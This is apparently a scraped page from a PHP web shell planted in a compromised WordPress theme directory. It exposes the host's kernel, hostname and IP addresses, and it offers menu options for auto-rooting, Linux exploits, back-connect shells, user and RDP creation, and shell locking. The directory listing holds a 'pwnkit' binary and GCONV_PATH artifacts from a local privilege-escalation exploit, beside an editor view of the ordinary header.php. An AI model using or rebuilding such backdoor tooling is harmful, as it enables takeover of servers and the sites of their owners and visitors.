Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.103.20.10 | : 216.73.217.75
Cant Read [ /etc/named.conf ]
7.4.33
cuisinesj
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
cuisinesj /
www /
new /
wp-content /
themes /
Avenue /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
tinymce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
612
B
-rw-r--r--
archive.php
2.24
KB
-rw-r--r--
author.php
1.92
KB
-rw-r--r--
blog.php
2.38
KB
-rw-r--r--
category.php
2.31
KB
-rw-r--r--
comments.php
4.26
KB
-rw-r--r--
contact.php
1.64
KB
-rw-r--r--
custom.css
22
B
-rw-r--r--
en_EN.po
6.74
KB
-rw-r--r--
footer.php
1.21
KB
-rw-r--r--
fullwidth.php
471
B
-rw-r--r--
functions.php
3.62
KB
-rw-r--r--
header.php
5.35
KB
-rw-r--r--
index.php
7.94
KB
-rw-r--r--
notifier.xml
1.17
KB
-rw-r--r--
page.php
478
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
screenshot.png
85.77
KB
-rw-r--r--
search.php
1.64
KB
-rw-r--r--
searchform.php
474
B
-rw-r--r--
shortcodes.php
11.84
KB
-rw-r--r--
sidebar.php
205
B
-rw-r--r--
single.php
11.57
KB
-rw-r--r--
style.css
30.16
KB
-rw-r--r--
tag.php
1.97
KB
-rw-r--r--
timthumb.php
46.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<!DOCTYPE html> <html <?php language_attributes(); ?>> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <!-- Mobile Specific Metas ================================================== --> <?php $isiPad = (bool) strpos($_SERVER['HTTP_USER_AGENT'],'iPad'); if(!$isiPad): ?> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <?php endif; ?> <title><?php bloginfo('name'); ?> <?php wp_title(' - ', true, 'left'); ?></title> <link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" /> <link rel="stylesheet" href="<?php bloginfo('template_directory'); ?>/js/colorbox/colorbox.css" type="text/css" /> <?php if(get_option('pyre_responsive_design') == 'Off'): ?> <link rel="stylesheet" href="<?php bloginfo('template_directory'); ?>/css/responsive.css" type="text/css" /> <?php endif; ?> <?php if(get_option('pyre_feedburner')): ?> <link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> RSS Feed" href="<?php echo get_option('pyre_feedburner'); ?>" /> <?php endif; ?> <?php if(get_option('pyre_favicon')): ?> <link rel="shortcut icon" href="<?php echo get_option('pyre_favicon'); ?>" /> <?php endif; ?> <?php wp_enqueue_script('jquery'); ?> <?php wp_enqueue_script('jCarouselLite', get_bloginfo('template_directory'). '/js/jcarousellite_1.0.1.pack.js'); ?> <?php wp_enqueue_script('nivo', get_bloginfo('template_directory'). '/js/jquery.nivo.slider.pack.js'); ?> <?php wp_enqueue_script('jquery.colorbox', get_bloginfo('template_directory'). '/js/colorbox/jquery.colorbox-min.js'); ?> <?php wp_enqueue_script('AvenueTheme', get_bloginfo('template_directory'). '/js/scripts.js'); ?> <?php wp_localize_script('AvenueTheme', 'AvenueVars', array( 'ajaxUrl' => admin_url('admin-ajax.php'), )); ?> <?php if(is_singular()) { wp_enqueue_script('comment-reply'); } ?> <?php wp_head(); ?> <script type='text/javascript'> jQuery(window).load(function() { // Implementation of Nivo Slider jQuery('#slider').nivoSlider({ effect: '<?php echo get_option('pyre_slider_effect'); ?>', pauseTime: '<?php echo get_option('pyre_slider_speed'); ?>', controlNavThumbs: true, controlNavThumbsFromRel: true, directionNav: false, directionNavHide: false, captionOpacity: false }); jQuery('.nivo-control').each(function() { jQuery('<div class="overlay">').appendTo(this); }); }); </script> <style type='text/css'> body { background:#<?php echo get_option('pyre_bg_color'); ?> url('<?php bloginfo('template_url'); ?>/images/patterns/<?php echo get_option('pyre_pattern'); ?>.png') repeat; } .arrows { color:#<?php echo get_option('pyre_link_color'); ?>; } .block-arrows, .block-arrows a { color:#<?php echo get_option('pyre_link_color'); ?>; } .meta-arrow { font-size:16px; color:#<?php echo get_option('pyre_link_color'); ?>; } .tweets a, .textwidget a { color:#<?php echo get_option('pyre_link_color'); ?>; } @media only screen and (min-width: 480px) and (max-width: 767px) { body { background: url('<?php bloginfo('template_url'); ?>/images/wrapper-bg-420.png') repeat-y center, #<?php echo get_option('pyre_bg_color'); ?> url('<?php bloginfo('template_url'); ?>/images/patterns/<?php echo get_option('pyre_pattern'); ?>.png') repeat; } } @media only screen and (max-width: 479px) { body { background: url('<?php bloginfo('template_url'); ?>/images/wrapper-bg-300.png') repeat-y center, #<?php echo get_option('pyre_bg_color'); ?> url('<?php bloginfo('template_url'); ?>/images/patterns/<?php echo get_option('pyre_pattern'); ?>.png') repeat; } } </style> </head> <body <?php body_class($class); ?>> <a name='top'></a> <!-- BEGIN WRAPPER --> <div id="wrapper" class="<?php if(get_option('pyre_responsive_design') == 'Off'): ?>responsiveX <?php endif; echo get_option('pyre_responsive_design'); ?>"> <!-- BEGIN HEADER-TOP --> <?php wp_nav_menu(array('theme_location' => 'topNav', 'depth' => 3, 'fallback_cb' => false, 'menu_class' => 'topNav')); ?> <!-- END HEADER-TOP --> <!-- BEGIN WRAPPER-CONTENT --> <div id="wrapper-content"> <!-- BEGIN HEADER --> <div id="header"> <!-- BEGIN HEADER-MIDDLE --> <div id="header-middle"> <div id="logo"> <?php if(get_option('pyre_logo')) { $logo = get_option('pyre_logo'); } else { if(get_option('pyre_skins')) { $color = explode('_', get_option('pyre_skins')); $logo = get_bloginfo('template_directory') . '/css/skins/images/' . $color[1] . '_logo.png'; } else { $logo = get_bloginfo('template_directory') . '/images/logo4.png'; } } ?> <a href='<?php bloginfo('wpurl'); ?>'><img src="<?php echo $logo; ?>" alt="<?php bloginfo('name'); ?>" /></a> </div> <?php if(get_option('pyre_header_banner')): ?> <div id="header-banner"> <?php echo get_option('pyre_header_banner'); ?> </div> <?php endif; ?> </div> <!-- END HEADER-MIDDLE --> <!-- BEGIN WRAPPER-NAVIGATION --> <div id="wrapper-navigation"> <div id="navigation"> <?php wp_nav_menu(array('theme_location' => 'mainNav', 'depth' => 3)); ?> </div> </div> <!-- END WRAPPER-NAVIGATION --> </div> <!-- END HEADER -->
Close